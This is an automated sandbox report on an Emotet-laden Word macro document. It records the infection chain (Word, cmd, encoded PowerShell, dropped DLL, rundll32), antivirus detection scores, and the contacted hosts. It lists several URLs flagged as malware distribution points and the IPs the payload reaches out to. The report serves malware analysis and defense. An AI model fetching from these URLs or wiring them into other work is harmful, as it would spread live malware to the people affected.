                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 347028 Sample: v22Pc0qA.doc.doc Startdate: 01/02/2021 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for dropped file 2->56 58 11 other signatures 2->58 9 cmd.exe 1 2->9         started        12 WINWORD.EXE 193 49 2->12         started        14 svchost.exe 1 2->14         started        16 2 other processes 2->16 process3 signatures4 62 Suspicious powershell command line found 9->62 64 Very long command line found 9->64 66 Encrypted powershell cmdline option found 9->66 68 PowerShell case anomaly found 9->68 18 powershell.exe 14 22 9->18         started        23 conhost.exe 9->23         started        25 msg.exe 1 9->25         started        process5 dnsIp6 44 isatechnology.com 35.208.182.43, 443, 49744 GOOGLE-2US United States 18->44 46 www.isatechnology.com 18->46 48 2 other IPs or domains 18->48 36 C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll, PE32 18->36 dropped 60 Powershell drops PE file 18->60 27 rundll32.exe 18->27         started        file7 signatures8 process9 process10 29 rundll32.exe 2 27->29         started        signatures11 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->70 32 rundll32.exe 12 29->32         started        process12 dnsIp13 38 50.116.111.59, 49773, 8080 UNIFIEDLAYER-AS-1US United States 32->38 40 173.249.20.233, 443, 49775 CONTABODE Germany 32->40 42 2 other IPs or domains 32->42 50 System process connects to network (likely due to code injection or exploit) 32->50 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                v22Pc0qA.doc.doc73%VirustotalBrowse
                v22Pc0qA.doc.doc47%MetadefenderBrowse
                v22Pc0qA.doc.doc86%ReversingLabsScript-Macro.Trojan.Valyria

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll100%Joe Sandbox ML
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll56%MetadefenderBrowse
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll96%ReversingLabsWin32.Trojan.Emotet

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                6.2.rundll32.exe.1090000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                8.2.rundll32.exe.f40000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                isatechnology.com7%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://isatechnology.com0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.30%Avira URL Cloudsafe
                https://physio-svdh.ch/angebot/physiotherapie/0%Avira URL Cloudsafe
                https://www.isatechnology.com/training/b/100%Avira URL Cloudmalware
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.00%Avira URL Cloudsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                http://transfersuvan.com/wp-admin/OVl/100%Avira URL Cloudmalware
                https://physio-svdh.ch/wp-content/themes/econature/js/jquer00%Avira URL Cloudsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://physio-svdh.ch/angebot/hausbesuche/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.00%Avira URL Cloudsafe
                http://cps.root-x1.letsencrypt.0%Avira URL Cloudsafe
                https://physio-svdh.ch/kontakt/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.30%Avira URL Cloudsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                http://cps.letsencrypt.org00%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7c0%Avira URL Cloudsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://physio-svdh.ch/0%Avira URL Cloudsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch0%Avira URL Cloudsafe
                https://physio-svdh.ch/ueber-uns/about-us/0%Avira URL Cloudsafe
                http://arquivopop.com.br/index_htm_files/Kxh/100%Avira URL Cloudmalware
                https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/offene-stellen/0%Avira URL Cloudsafe
                https://physio-svdh.ch/angebot/training-fuer-senioren/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp0%Avira URL Cloudsafe
                https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
                https://cairocad.com/cgi-bin/1PBB/100%Avira URL Cloudmalware
                https://www.isatechnology.comArAC0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedi0%Avira URL Cloudsafe
                https://physio-svdh.ch/xmlrpc.php0%Avira URL Cloudsafe
                http://ownitconsignment.com/files/b/100%Avira URL Cloudmalware
                https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.00%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?0%Avira URL Cloudsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.00%Avira URL Cloudsafe
                https://physio-svdh.ch/comments/feed/0%Avira URL Cloudsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?v0%Avira URL Cloudsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://api.cortana.ai0%URL Reputationsafe
                https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.00%Avira URL Cloudsafe
                https://staging.cortana.ai0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe
                https://staging.cortana.ai0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                isatechnology.com
                		35.208.182.43
                		truetrueunknown
                physio-svdh.ch
                		194.209.195.106
                		truefalse
                  		unknown
                  www.isatechnology.com
                  		unknown
                  		unknowntrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://shell.suite.office.com:1443DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                      		high
                      https://autodiscover-s.outlook.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                        		high
                        http://isatechnology.compowershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://corp.roblox.com/contact/svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpfalse
                          		high
                          https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                            		high
                            https://physio-svdh.ch/angebot/physiotherapie/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.isatechnology.com/training/b/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://cdn.entity.DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                              		high
                              https://rpsticket.partnerservices.getmicrosoftkey.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://lookup.onenote.com/lookup/geolocation/v1DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                		high
                                http://transfersuvan.com/wp-admin/OVl/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://physio-svdh.ch/wp-content/themes/econature/js/jquer0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                    		high
                                    https://api.aadrm.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://physio-svdh.ch/angebot/hausbesuche/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://cps.root-x1.letsencrypt.powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://use.fontawesome.com/releases/v5.8.2/css/all.css?ver=5.5.3powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                      		high
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                        		high
                                        https://api.microsoftstream.com/api/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                          		high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                            		high
                                            https://cr.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpfalse
                                                		high
                                                https://physio-svdh.ch/kontakt/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.3powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.689707383.00000271135D1000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.hulu.com/do-not-sell-my-infosvchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://store.office.cn/addinstemplateDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://cps.letsencrypt.org0powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://wus2-000.pagecontentsync.DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7cpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.roblox.com/developsvchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                            		high
                                                            https://physio-svdh.ch/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.odwebp.svc.msDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                		high
                                                                https://corp.roblox.com/parents/svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749484580.00000279643DF000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://graph.windows.netDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                    		high
                                                                    https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://gmpg.org/xfn/11powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                          		high
                                                                          https://physio-svdh.chpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                            		high
                                                                            http://weather.service.msn.com/data.aspxDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                              		high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                		high
                                                                                https://physio-svdh.ch/ueber-uns/about-us/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                  		high
                                                                                  https://clients.config.office.net/user/v1.0/iosDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                    		high
                                                                                    http://arquivopop.com.br/index_htm_files/Kxh/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://o365auditrealtimeingestion.manage.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                      		high
                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                        		high
                                                                                        https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://clients.config.office.net/user/v1.0/android/policiesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                          		high
                                                                                          https://physio-svdh.ch/offene-stellen/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://physio-svdh.ch/angebot/training-fuer-senioren/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://entitlement.diagnostics.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                            		high
                                                                                            https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wppowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                              		high
                                                                                              https://outlook.office.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                		high
                                                                                                https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://physio-svdh.ch/wp-includes/wlwmanifest.xmlpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://cairocad.com/cgi-bin/1PBB/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://storage.live.com/clientlogs/uploadlocationDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                  		high
                                                                                                  https://www.hulu.com/ca-privacy-rightssvchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.isatechnology.comArACpowershell.exe, 00000004.00000002.697183346.0000027114743000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedipowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://physio-svdh.ch/xmlrpc.phppowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://graph.windows.net/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                        		high
                                                                                                        https://devnull.onenote.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                          		high
                                                                                                          http://ownitconsignment.com/files/b/powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://messaging.office.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                            		high
                                                                                                            https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://physio-svdh.ch/comments/feed/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              		high
                                                                                                              https://skyapi.live.net/Activity/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?vpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://api.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                		high
                                                                                                                https://staging.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://onedrive.live.com/embed?DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                  		high
                                                                                                                  https://augloop.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                    		high

                                                                                                                    Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    194.209.195.106
                                                                                                                    		unknownSwitzerland
                                                                                                                    		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
                                                                                                                    97.120.3.198
                                                                                                                    		unknownUnited States
                                                                                                                    		209CENTURYLINK-US-LEGACY-QWESTUStrue
                                                                                                                    35.208.182.43
                                                                                                                    		unknownUnited States
                                                                                                                    		19527GOOGLE-2UStrue
                                                                                                                    70.180.33.202
                                                                                                                    		unknownUnited States
                                                                                                                    		22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                    50.116.111.59
                                                                                                                    		unknownUnited States
                                                                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                    173.249.20.233
                                                                                                                    		unknownGermany
                                                                                                                    		51167CONTABODEtrue

                                                                                                                    Private

                                                                                                                    IP
                                                                                                                    192.168.2.1

                                                                                                                    General Information

                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                    Analysis ID:347028
                                                                                                                    Start date:01.02.2021
                                                                                                                    Start time:23:24:14
                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                    Overall analysis duration:0h 7m 49s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Sample file name:v22Pc0qA.doc.doc
                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                    Number of analysed new started processes analysed:23
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • HDC enabled
                                                                                                                    • GSI enabled (VBA)
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Detection:MAL
